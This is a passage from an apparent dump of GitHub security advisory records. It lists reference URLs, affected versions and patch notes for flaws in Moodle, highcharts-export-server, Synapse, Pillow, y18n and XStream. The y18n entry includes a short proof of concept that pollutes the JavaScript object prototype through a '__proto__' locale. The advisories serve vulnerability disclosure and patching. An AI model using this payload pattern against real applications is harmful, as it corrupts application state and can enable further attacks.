'https://lists.apache.org/thread.html/r1456eab5f3768be69436d5b0a68b483eb316eb85eb3ef6eba156a302@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1504886a550426d3c05772c47b1a6350c3235e51fd1fdffbec43e974@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r15eed5d21e16a5cce810c1e096ffcffc36cd08c2f78ce2f9b24b4a6a@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r179119bbfb5610499286a84c316f6789c5afbfa5340edec6eb28d027@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17cca685ad53bc8300ee7fcfe874cb784a222343f217dd076e7dc1b6@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r18732bb1343894143d68db58fe4c8f56d9cd221b37f1378ed7373372@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r191a9279e2863b68e5496ee4ecd8be0d4fe43b324b934f0d1f106e1d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r196409cc4df929d540a2e66169104f2b3b258d8bd96b5f083c59ee51@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1dea91f0562e0a960b45b1c5635b2a47b258b77171334276bcf260a7@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fb2d26b81c64ce96c4fd42b9e6842ff315b02c36518213b6c057350@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r20f6f8f8cf07986dc5304baed3bf4d8a1c4cf135ff6fe3640be4d7ec@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r278e96edc4bc13efb2cb1620a73e48f569162b833c6bda3e6ea18b80@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27b7d3d95ffa8498899ef1c9de553d469f8fe857640a3f6e58dba640@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r286e9a13d3ab0550042997219101cb87871834b8d5ec293b0c60f009@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r298a25228868ebc0943d56c8f3641212a0962d2dbcf1507d5860038e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d180180f37c2ab5cebd711d080d01d8452efa8ad43c5d9cd7064621@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ed66a3823990306b742b281af1834b9bc85f98259c870b8ffb13d93@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f6a547f226579f542eb08793631d1f2d47d7aed7e2f9d11a4e6af9f@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3550b61639688e0efbc253c6c3e6358851c1f053109f1c149330b535@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3a1291a7ab8ee43db87cb0253371489810877028fc6e7c68dc640926@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3de0e0c26d4bd00dd28cab27fb44fba11d1c1d20275f7cce71393dd1@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3e31ec7e8c39db7553be4f4fd4d27cf27c41f1ba9c985995c4ea9c5a@%3Cnotifications.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f3e1d562c528b4bafef2dde51f79dd444a4b68ef24920d68068b6f9@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f97dbbbb1b2a7324521208bb595392853714e141a37b8f68d395835@%3Cnotifications.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r409e296c890753296c544a74d4de0d4a3ce719207a5878262fa2bd71@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r421a9a76811c1aed7637b5fe5376ab14c09ccdd7b70d5211d6e76d1e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r43dc2b2e928e9d845b07ac075634cb759d91bb852421dc282f87a74a%40%3Cdev.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r449288f6a941a2585262e0f4454fdefe169d5faee33314f6f89fab30@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d90b6d8de9697beb38814596d3a0d4994fa9aba1f6731a2c648d3ae@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4fa53eacca2ac38904f38dc226caebb3f2f668b2da887f2fd416f4a7@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r515e01a30443cfa2dbb355c44c63149869afd684fb7b0344c58fa67b@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r533a172534ae67f6f17c4d33a1b814d3d5ada9ccd4eb442249f33fa2@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r587b4a5bcbc290269df0906bafba074f3fe4e50d4e959212f56fa7ea@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r62aa6d07b23095d980f348d330ed766560f9a9e940fec051f534ce37@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r635133a74fa07ef3331cae49a9a088365922266edd58099a6162a5d3@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r668aed02e287c93403e0b8df16089011ee4a96afc8f479809f1fc07f@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6990c849aeafe65366794bfd002febd47b7ffa8cf3c059b400bbb11d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r699c031e6921b0ad0f943848e7ba1d0e88c953619d47908618998f76@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ae3c68b0bfe430fb32f24236475276b6302bed625b23f53b68748b5@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ba4f0817f98bf7c1cb314301cb7a24ba11a0b3e7a5be8b0ae3190b0@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6c5b7324274fd361b038c5cc316e99344b7ae20beae7163214fac14d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72c3d1582d50b2ca7dd1ee97e81c847a5cf3458be26d42653c39d7a6@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r741364444c3b238ab4a161f67f0d3a8f68acc517a39e6a93aa85d753@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74eb88b422421c65514c23cb9c2b2216efb9254317ea1b6a264fe6dc@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7597683cc8b87a31ec864835225a543dad112d7841bf1f17bf7eb8db@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7ae909438ff5a2ffed9211e6ab0bd926396fd0b1fc33f31a406ee704@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r812915ecfa541ad2ca65c68a97b2c014dc87141dfaefc4de85049681@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r850522c56c05aa06391546bdb530bb8fc3437f2b77d16e571ae73309@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r869331422580d35b4e65bd74cf3090298c4651bf4f31bfb19ae769da@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r886b6d9a89b6fa0aafbf0a8f8f14351548d6c6f027886a3646dbd075@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8897a41f50d4eb19b268bde99328e943ba586f77779efa6de720c39f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r890b8ec5203d70a59a6b1289420d46938d9029ed706aa724978789be@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89fdd39965efb7c6d22bc21c286d203252cea476e1782724aca0748e@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8dfbefcd606af6737b62461a45a9af9222040b62eab474ff2287cf75@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90b4473950e26607ed77f3d70f120166f6a36a3f80888e4eeabcaf91@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r93f23f74315e009f4fb68ef7fc794dceee42cf87fe6613814dcd8c70@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r950ced188d62320fdb84d9e2c6ba896328194952eff7430c4f55e4b0@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r995b945cc8f6ec976d8c52d42ba931a688b45fb32cbdde715b6a816a@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b51e7c253cb0989b4c03ed9f4e5f0478e427473357209ccc4d08ebf@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ec75f690dd60fec8621ba992290962705d5b7f0d8fd0a42fab0ac9f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra3f7f06a1759c8e2985ed24ae2f5483393c744c1956d661adc873f2c@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra7371efd8363c1cd0f5331aafd359a808cf7277472b8616d7b392128@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9f7c755790313e1adb95d29794043fb102029e803daf4212ae18063@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/race178e9500ab8a5a6112667d27c48559150cadb60f2814bc67c40af@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad635e16b300cf434280001ee6ecd2ed2c70987bf16eb862bfa86e02@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rada9d2244a66ede0be29afc5d5f178a209f9988db56b9b845d955741@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae95c2234b6644bfd666b2671a1b42a09f38514d0f27cca3c7d5d55a@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raea1bb8cf2eb39c5e10543f547bdbbdbb563c2ac6377652f161d4e37@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb3574bc1036b577b265be510e6b208f0a5d5d84cd7198347dc8482df@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb44ec04e5a9b1f87fef97bb5f054010cbfaa3b8586472a3a38a16fca@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51977d392b01434b0b5df5c19b9ad5b6178cfea59e676c14f24c053@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb91c32194eb5006f0b0c8bcdbd512c13495a1b277d4d51d45687f036@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc5cad06a46d23253a3c819229efedecfc05f89ef53f5fdde77a86d6@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbfbb81e7fb5d5009caf25798f02f42a7bd064a316097303ba2f9ed76@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc48ab5455bdece9a4afab53ca0f1e4f742d5baacb241323454a87b4e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7a241e0af086b226ff9ccabc4a243d206f0f887037994bfd8fcaaeb@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7a79b08822337c68705f16ee7ddcfd352313b836e78a4b86c7a7e3d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc896ce7761999b088f3adabcb99dde2102b6a66130b8eec6c8265eab@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcace846f74ea9e2af2f7c30cef0796724aa74089f109c8029b850163@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcae4c66f67e701db44d742156dee1f3e5e4e07ad7ce10c740a76b669@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcdf62ecd36e39e4ff9c61802eee4927ce9ecff1602eed1493977ef4c@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0734d91f16d5b050f0bcff78b4719300042a34fadf5e52d0edf898e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd370fdb419652c5219409b315a6349b07a7e479bd3f151e9a5671774@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd49d53b146d94a7d3a135f6b505589655ffec24ea470e345d31351bb@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd78cdd87d84499a404202f015f55935db3658bd0983ecec81e6b18c6@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdc8e0f92d06decaee5db58de4ded16d80016a7db2240a8db17225c49@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdcf00186c34d69826d9c6b1f010136c98b00a586136de0061f7d267e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf568168e7f83871969928c0379813da6d034485f8b20fa73884816d6@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf603d25213cfff81d6727c259328846b366fd32a43107637527c9768@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf65df763f630163a3f620887efec082080555cee1adb0b8eaf2c7ddb@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf741d08c7e0ab1542c81ea718467422bd01159ed284796a36ad88311@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf75979ae0ffd526f3afa935a8f0ee13c82808ea8b2bc0325eb9dcd90@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfbb01bb85cdc2022f3b96bdc416dbfcb49a2855b3a340aa88b2e1de9@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-32'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T19:44:27Z', 'nvd_published_at': '2021-02-12T20:15:00Z'}" +1.4.0,GHSA-5x33-h32w-6vr2,2021-03-24T23:14:52Z,2021-03-29T20:43:15Z,,['CVE-2020-25628'],Cross site-scripting (XSS) moodle,"The filter in the tag manager required extra sanitizing to prevent a reflected XSS risk. This affects 3.9 to 3.9.1, 3.8 to 3.8.4, 3.7 to 3.7.7, 3.5 to 3.5.13 and earlier unsupported versions. Fixed in 3.9.2, 3.8.5, 3.7.8 and 3.5.14.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25628'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/e8632a4ad0b4da3763cbbe5949594aa449b483bb'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=410840'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-69340'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:14:52Z', 'nvd_published_at': '2020-12-08T01:15:00Z'}" +1.4.0,GHSA-hfwx-c7q6-g54c,2021-03-12T22:32:16Z,2021-03-12T23:04:46Z,,[],Vulnerability allowing for reading internal HTTP resources,"### Impact + +The vulnerability allows for reading and outputting files served by other services on the internal network in which the export server is hosted. If the export server is exposed to the internet, this potentially allows a malicious user to gain read access to internal web-resources. + +The impact is limited to internal services that serve content via. HTTP(S), and requires the attacker to know internal hostnames/IP addresses. + +The previous versions have been marked as deprecated on NPM. + +### Patches + +Version 2.1.0 released alongside this security advisory addresses the issue. **Please note that this release is not backwards compatible out of the box. See the [changelog](https://github.com/highcharts/node-export-server/blob/master/CHANGELOG.md) for details.** + +Additionally, it's also recommended to upgrade to the latest version of Highcharts to get the added input sanitation implemented in version 9.0 and later. + +### Workarounds + +There are no known workarounds to the issue - an upgrade to version 2.1.0 is required. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [the export server issue tracker](https://github.com/highcharts/node-export-server/issues) +* Email us at [security@highsoft.com](mailto:security@highsoft.com)",[],"[{'package': {'ecosystem': 'npm', 'name': 'highcharts-export-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.30'}}]","[{'type': 'WEB', 'url': 'https://github.com/highcharts/node-export-server/security/advisories/GHSA-hfwx-c7q6-g54c'}, {'type': 'WEB', 'url': 'https://github.com/highcharts/node-export-server/commit/53fa992a96785a5a08390e55ec30ea2ad217dfe6'}, {'type': 'WEB', 'url': 'https://github.com/highcharts/node-export-server/blob/master/CHANGELOG.md#210'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/highcharts-export-server'}]","{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:32:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-2hwx-mjrm-v3g8,2021-08-31T21:06:54Z,2021-03-01T19:34:54Z,,['CVE-2021-21274'],Denial of service attack via .well-known lookups,"### Impact +A malicious homeserver could redirect requests to their .well-known file to a large file. This can lead to a denial of service attack where homeservers will consume significantly more resources when requesting the .well-known file of a malicious homeserver. + +This affects any server which accepts federation requests from untrusted servers. + +### Patches +Issue is resolved by #8950. A bug not affecting the security aspects of this was fixed in #9108. + +### Workarounds +The `federation_domain_whitelist` setting can be used to restrict the homeservers communicated with over federation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.99.0'}, {'fixed': '1.25.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-2hwx-mjrm-v3g8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21274'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/8950'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/ff5c4da1289cb5e097902b3e55b771be342c29d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.25.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-01T19:03:06Z', 'nvd_published_at': '2021-02-26T18:15:00Z'}" +1.4.0,GHSA-p43w-g3c5-g5mq,2021-12-02T15:31:00Z,2021-03-29T16:35:27Z,,['CVE-2021-25293'],Out of bounds read in Pillow,An issue was discovered in Pillow before 8.1.1. There is an out-of-bounds read in SGIRleDecode.c.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25293'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/4853e522bddbec66022c0915b9a56255d0188bf9'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:07:38Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}" +1.4.0,GHSA-mvg9-xffr-p774,2023-09-04T16:29:59Z,2021-03-29T16:35:57Z,,['CVE-2021-25291'],Out of bounds read in Pillow,"An issue was discovered in Pillow before 8.2.0. In `TiffDecode.c`, there is an out-of-bounds read in `TiffreadRGBATile` via invalid tile boundaries.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25291'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/cbdce6c5d054fccaf4af34b47f212355c64ace7a'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:05:25Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}" +1.4.0,GHSA-c4w7-xm78-47vh,2023-09-07T20:22:08Z,2021-03-29T16:05:12Z,,['CVE-2020-7774'],Prototype Pollution in y18n,"### Overview + +The npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. + +### POC + +```js +const y18n = require('y18n')(); + +y18n.setLocale('__proto__'); +y18n.updateLocale({polluted: true}); + +console.log(polluted); // true +``` + +### Recommendation + +Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'y18n'}, 'ecosystem_specific': {'affected_functions': ['y18n']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'y18n'}, 'ecosystem_specific': {'affected_functions': ['y18n']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.1'}]}], 'versions': ['4.0.0']}, {'package': {'ecosystem': 'npm', 'name': 'y18n'}, 'ecosystem_specific': {'affected_functions': ['y18n']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7774'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/issues/96'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/pull/108'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/yargs/y18n'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-Y18N-1021887'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-20', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:23:11Z', 'nvd_published_at': '2020-11-17T13:15:00Z'}" +1.4.0,GHSA-hrcp-8f3q-4w2c,2022-02-08T21:32:01Z,2021-03-22T23:29:37Z,,['CVE-2021-21351'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21351](https://x-stream.github.io/CVE-2021-21351.html). + +### Credits +wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 